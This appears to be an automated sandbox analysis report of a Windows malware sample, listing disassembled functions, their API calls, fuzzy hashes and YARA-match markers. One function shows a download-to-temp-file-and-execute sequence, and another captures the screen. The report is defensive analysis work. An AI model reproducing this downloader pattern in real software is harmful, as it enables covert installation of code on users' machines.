String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: b95969067abf03d355d54777efd578a1da0751fcde7f9ae1011d11fae8ca95d6
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: E4115E72380100AFD754EF55DC81FA673EAEB89360B298166FD05CB356E679EC41C760

Function 024A0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: d2f4d3bb4b2cbe01b0d25eaf4a28ec74c27e07ab8f56957cf8c9ab6a2dcf7ba0
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: EB012673A106008FDF21CF20C914BAB33F5FB96206F0550BAD90AD7381E370A941CB80

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 024CE919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024CE989
_free.LIBCMT ref: 024CE99F
_free.LIBCMT ref: 024CE9B0
_free.LIBCMT ref: 024CE9C1
_free.LIBCMT ref: 024CE9D8
GetCPInfo.KERNEL32(?,?), ref: 024CEA20

Part of subcall function 024D6952: _free.LIBCMT ref: 024D69BD

_free.LIBCMT ref: 024CEBCC
_free.LIBCMT ref: 024CEBDF
_free.LIBCMT ref: 024CEBED
_free.LIBCMT ref: 024CEBF8
_free.LIBCMT ref: 024CEC3A
_free.LIBCMT ref: 024CEC42
_free.LIBCMT ref: 024CEC4A
_free.LIBCMT ref: 024CEC52
_free.LIBCMT ref: 024CEC60

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: ddf4bf2d678f15a6bd156ee1ccd30e6d49c52f82e84c94846958af7556e3a17c
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: FEB18B75A003099FDB61DF69C890BEEBBB5BF09304F24416EE495A7351D775A841CF20

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 024DA85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 024DA8A3

Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C0F
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C21
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C33
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C45
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C57
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C69
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C7B
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C8D
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9C9F
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9CB1
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9CC3
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9CD5
Part of subcall function 024D9BF2: _free.LIBCMT ref: 024D9CE7

_free.LIBCMT ref: 024DA898

Part of subcall function 024D36D1: HeapFree.KERNEL32(00000000,00000000,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?), ref: 024D36E7
Part of subcall function 024D36D1: GetLastError.KERNEL32(?,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?,?), ref: 024D36F9

_free.LIBCMT ref: 024DA8BA
_free.LIBCMT ref: 024DA8CF
_free.LIBCMT ref: 024DA8DA
_free.LIBCMT ref: 024DA8FC
_free.LIBCMT ref: 024DA90F
_free.LIBCMT ref: 024DA91D
_free.LIBCMT ref: 024DA928
_free.LIBCMT ref: 024DA960
_free.LIBCMT ref: 024DA967
_free.LIBCMT ref: 024DA984
_free.LIBCMT ref: 024DA99C

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: bd3c5142786ff91dba411683c7713dc630be6f595f797aa3f177ad7c9774fe49
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: 7E315C316002119FEB30AF3AE854B5BB7E9AF00754F1548AFE849D7790DB71A850CE65

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 024A2C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024A2C7E
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 024A2C94
GetTempPathW.KERNEL32(00000105,?), ref: 024A2CB0
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 024A2CC6
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 024A2CFF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024A2D3B
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 024A2D58
ShellExecuteExW.SHELL32(?), ref: 024A2DCF
WaitForSingleObject.KERNEL32(?,00008000), ref: 024A2DE4

Strings

<, xrefs: 024A2DAC

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction ID: f8376f39cbc680726627f03fa262cc89ef4a0d57456ea7302e91473f8284e7fa
Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction Fuzzy Hash: 24416F7194021DAFEB20DF649C85FEAB7BCFF15705F0080EAA548A2150DFB09E858FA4

Function 024BEEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024BF228,00000004,024B7D87,00000004,024B8069), ref: 024BEEF9
GetLastError.KERNEL32(?,024BF228,00000004,024B7D87,00000004,024B8069,?,024B8799,?,00000008,024B800D,00000000,?,?,00000000,?), ref: 024BEF05
LoadLibraryW.KERNEL32(advapi32.dll,?,024BF228,00000004,024B7D87,00000004,024B8069,?,024B8799,?,00000008,024B800D,00000000,?,?,00000000), ref: 024BEF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 024BEF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF9D

Strings

advapi32.dll, xrefs: 024BEEF3, 024BEEF8, 024BEF14

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: e46dc29805512aa2a7d94def5fb2338a8fbf836280d4bc568fe59861864f394c
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: C32151B5904711BFE7116FB49C0CA9ABFA8EF09B16F004A2BF555E3650CBBC94418FA4

Function 024BEEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024BF228,00000004,024B7D87,00000004,024B8069), ref: 024BEEF9
GetLastError.KERNEL32(?,024BF228,00000004,024B7D87,00000004,024B8069,?,024B8799,?,00000008,024B800D,00000000,?,?,00000000,?), ref: 024BEF05
LoadLibraryW.KERNEL32(advapi32.dll,?,024BF228,00000004,024B7D87,00000004,024B8069,?,024B8799,?,00000008,024B800D,00000000,?,?,00000000), ref: 024BEF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 024BEF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF9D

Strings

advapi32.dll, xrefs: 024BEEF3, 024BEEF8, 024BEF14

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: fbcb92d4f1cdcf818f112b58a3f072f9c3d94ad34d7fafeb73b30db36e63ed71
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: 192181B1904711BFE7116F649C08A9ABBECEF0AB16F004A2BF555D3600CBBC94418BA8

Function 024B24A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024B670B), ref: 024B24B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024B24C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024B24D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024B670B), ref: 024B2500
GetProcAddress.KERNEL32(00000000), ref: 024B2507
GetLastError.KERNEL32(?,?,?,024B670B), ref: 024B2522
GetLastError.KERNEL32(?,?,?,024B670B), ref: 024B252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B2544
__CxxThrowException@8.LIBVCRUNTIME ref: 024B2552

Strings

kernel32.dll, xrefs: 024B24B0, 024B24B5, 024B24FA

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: 5a76a6816cae65ec94179f5a20938ee6ff36c2ffc1a2c9e150d9f36bbf03e7b9
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: 2E11A9795003117FE712BB756C599AB7BAC9D06B12720052BFC01E3251EBB8D5018A7D

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

pContext, xrefs: 00424946
switchState, xrefs: 00424882

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 024C0C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 024C0C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024C0C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024C0CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024C0D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024C0D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024C0D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024C0D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024C0D80
__CxxThrowException@8.LIBVCRUNTIME ref: 024C0DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024C0DBC

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: f6c7ac24383507c5f8fac25afba969d6e0fee31e27b0a149498c89f5997f02a9
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: 8E41B238A04208DBCF59FFA9C4647EE7766AF41304F2440AFD8065B382CB659A49CF65

Function 024D204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024D2061

Part of subcall function 024D36D1: HeapFree.KERNEL32(00000000,00000000,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?), ref: 024D36E7
Part of subcall function 024D36D1: GetLastError.KERNEL32(?,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?,?), ref: 024D36F9

_free.LIBCMT ref: 024D206D
_free.LIBCMT ref: 024D2078
_free.LIBCMT ref: 024D2083
_free.LIBCMT ref: 024D208E
_free.LIBCMT ref: 024D2099
_free.LIBCMT ref: 024D20A4
_free.LIBCMT ref: 024D20AF
_free.LIBCMT ref: 024D20BA
_free.LIBCMT ref: 024D20C8

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 7942f0cd5f710d0925f306420f540038bf5271a78530a62ebfb61803e0bb5e45
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 1B11747A600108AFCB51EF56D851CD93FA6EF04750B5140AAFE098F221DB71EE60DF81

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
